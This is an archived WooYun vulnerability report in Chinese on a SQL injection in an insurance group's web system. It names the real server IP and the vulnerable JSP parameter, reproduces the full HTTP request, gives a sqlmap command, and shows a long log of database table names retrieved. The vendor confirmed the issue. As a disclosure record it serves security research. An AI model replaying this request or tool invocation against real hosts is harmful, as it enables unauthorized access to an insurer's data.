当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142197

漏洞标题:泛华保险服务集团某系统sql注入单个数据库涉及1000多个表

相关厂商:泛华保险服务集团

漏洞作者: 路人甲

提交时间:2015-09-23 09:09

修复时间:2015-11-10 18:36

公开时间:2015-11-10 18:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经确认,细节仅向厂商公开
2015-10-06: 细节向核心白帽子及相关领域专家公开
2015-10-16: 细节向普通白帽子公开
2015-10-26: 细节向实习白帽子公开
2015-11-10: 细节向公众公开

简要描述:

单个数据库涉及1000多个表

详细说明:

注入点如下

GET /aeongroup/InsuranceCeSuan.jsp?RiskCode=204901057 HTTP/1.1
Host: 219.141.188.51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://219.141.188.51/aeongroup/ProductGList.jsp?EdorFlag=A3
Cookie: JSESSIONID=00009wK3LZiAozxiRGH2NhD9GSd:18lmrf6id; Role.LastRoleCode=0001
Connection: keep-alive


直接sqlmap执行 -r 来注入
1000多个表

1.jpg


2.jpg

漏洞证明:

[12:46:35] [INFO] retrieved: riskcode202101020dutycodeegd014001803b
[12:46:35] [INFO] retrieved: riskcode202101020dutycodeegd014001804
[12:46:36] [INFO] retrieved: riskcode202101020dutycodeegd014001804b
[12:46:37] [INFO] retrieved: riskcode202101021dutycode000b
[12:46:37] [INFO] retrieved: riskcode202101021dutycodeeia014005801
[12:46:38] [INFO] retrieved: riskcode202101021dutycodeeia014005801b
[12:46:39] [INFO] retrieved: riskcode202101021dutycodeeia014005803
[12:46:48] [INFO] retrieved: riskcode202101021dutycodeeia014005803b
[12:46:49] [INFO] retrieved: riskcode202101022dutycode000b
[12:46:50] [INFO] retrieved: riskcode202101022dutycodeeia014005901
[12:46:50] [INFO] retrieved: riskcode202101022dutycodeeia014005901b
[12:46:51] [INFO] retrieved: riskcode202101022dutycodeeia014005903
[12:46:52] [INFO] retrieved: riskcode202101022dutycodeeia014005903b
[12:46:55] [INFO] retrieved: riskcode202201001dutycode000
[12:46:56] [INFO] retrieved: riskcode202201001dutycode000b
[12:46:56] [INFO] retrieved: riskcode202201002dutycode000
[12:46:57] [INFO] retrieved: riskcode202201002dutycode000b
[12:46:58] [INFO] retrieved: riskcode202201004dutycode000
[12:47:07] [INFO] retrieved: riskcode202201004dutycode000b
[12:47:08] [INFO] retrieved: riskcode202201005dutycode000
[12:47:09] [INFO] retrieved: riskcode202201005dutycode000b
[12:47:10] [INFO] retrieved: riskcode202201007dutycode000
[12:47:11] [INFO] retrieved: riskcode202201007dutycode000b
[12:47:12] [INFO] retrieved: riskcode202201008dutycode000
[12:47:12] [INFO] retrieved: riskcode202201008dutycode000b
[12:47:16] [INFO] retrieved: riskcode202201009dutycode000
[12:47:16] [INFO] retrieved: riskcode202201009dutycode000b
[12:47:17] [INFO] retrieved: riskcode202201010dutycode000
[12:47:18] [INFO] retrieved: riskcode202201010dutycode000b
[12:47:18] [INFO] retrieved: riskcode202201011dutycode000
[12:47:19] [INFO] retrieved: riskcode202201011dutycode000b
[12:47:20] [INFO] retrieved: riskcode202201012dutycode000
[12:47:21] [INFO] retrieved: riskcode202201012dutycode000b
[12:47:21] [INFO] retrieved: riskcode202201018dutycode000b
[12:47:22] [INFO] retrieved: riskcode202201019dutycode000b
[12:47:24] [INFO] retrieved: riskcode202201020dutycode000
[12:47:24] [INFO] retrieved: riskcode202201020dutycode000b
[12:47:46] [INFO] retrieved: riskcode202201021dutycode000
[12:47:47] [INFO] retrieved: riskcode202201021dutycode000b
[12:47:47] [INFO] retrieved: riskcode202201022dutycode000
[12:47:48] [INFO] retrieved: riskcode202201022dutycode000b
[12:47:49] [INFO] retrieved: riskcode202201023dutycode000b
[12:47:49] [INFO] retrieved: riskcode202201024dutycode000b
[12:47:50] [INFO] retrieved: riskcode202201025dutycode000
[12:47:51] [INFO] retrieved: riskcode202201025dutycode000b
[12:47:52] [INFO] retrieved: riskcode202201026dutycode000
[12:47:53] [INFO] retrieved: riskcode202201026dutycode000b
[12:47:53] [INFO] retrieved: riskcode202201027dutycode000
[12:47:54] [INFO] retrieved: riskcode202201027dutycode000b
[12:47:55] [INFO] retrieved: riskcode202201028dutycode000
[12:47:56] [INFO] retrieved: riskcode202201028dutycode000b
[12:47:57] [INFO] retrieved: riskcode202202001dutycode000
[12:47:57] [INFO] retrieved: riskcode202202001dutycode000b
[12:47:58] [INFO] retrieved: riskcode202232001dutycode000
[12:47:59] [INFO] retrieved: riskcode202232001dutycode000b
[12:48:03] [INFO] retrieved: riskcode202301001dutycode000
[12:48:06] [INFO] retrieved: riskcode202301001dutycode000b
[12:48:07] [INFO] retrieved: riskcode202301002dutycode000
[12:48:08] [INFO] retrieved: riskcode202301002dutycode000b
[12:48:09] [INFO] retrieved: riskcode202301003dutycode000
[12:48:10] [INFO] retrieved: riskcode202301003dutycode000b
[12:48:11] [INFO] retrieved: riskcode202301004dutycode000
[12:48:15] [INFO] retrieved: riskcode202301004dutycode000b
[12:48:15] [INFO] retrieved: riskcode202301008dutycode000
[12:48:16] [INFO] retrieved: riskcode202301008dutycode000b
[12:48:17] [INFO] retrieved: riskcode202301009dutycode000
[12:48:18] [INFO] retrieved: riskcode202301009dutycode000b
[12:48:19] [INFO] retrieved: riskcode202301010dutycode000
[12:48:20] [INFO] retrieved: riskcode202301010dutycode000b
[12:48:21] [INFO] retrieved: riskcode202301011dutycode000
[12:48:30] [INFO] retrieved: riskcode202301011dutycode000b
[12:48:40] [INFO] retrieved: riskcode202301012dutycode000
[12:48:41] [INFO] retrieved: riskcode202301012dutycode000b
[12:48:42] [INFO] retrieved: riskcode202301013dutycode000
[12:48:43] [INFO] retrieved: riskcode202301013dutycode000b
[12:48:43] [INFO] retrieved: riskcode202301014dutycode000
[12:48:44] [INFO] retrieved: riskcode202301014dutycode000b
[12:48:45] [INFO] retrieved: riskcode202301015dutycode000b
[12:48:45] [INFO] retrieved: riskcode202301016dutycode000
[12:48:47] [INFO] retrieved: riskcode202301016dutycode000b
[12:48:47] [INFO] retrieved: riskcode202302001dutycode000
[12:48:48] [INFO] retrieved: riskcode202302001dutycode000b
[12:48:48] [INFO] retrieved: riskcode203401001dutycode000
[12:48:50] [INFO] retrieved: riskcode203401001dutycode000b
[12:48:50] [INFO] retrieved: riskcode203401002dutycode000
[12:48:51] [INFO] retrieved: riskcode203401002dutycode000b
[12:48:52] [INFO] retrieved: riskcode203401003dutycode000
[12:48:53] [INFO] retrieved: riskcode203401003dutycode000b
[12:48:53] [INFO] retrieved: riskcode203401004dutycode000
[12:48:55] [INFO] retrieved: riskcode203401004dutycode000b
[12:48:56] [INFO] retrieved: riskcode203401005dutycode000
[12:48:56] [INFO] retrieved: riskcode203401005dutycode000b
[12:48:57] [INFO] retrieved: riskcode203401006dutycode000
[12:48:58] [INFO] retrieved: riskcode203401006dutycode000b
[12:49:02] [INFO] retrieved: riskcode203401007dutycode000

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-26 18:35

厂商回复:

已通知开发平台,非常感谢!

最新状态:

暂无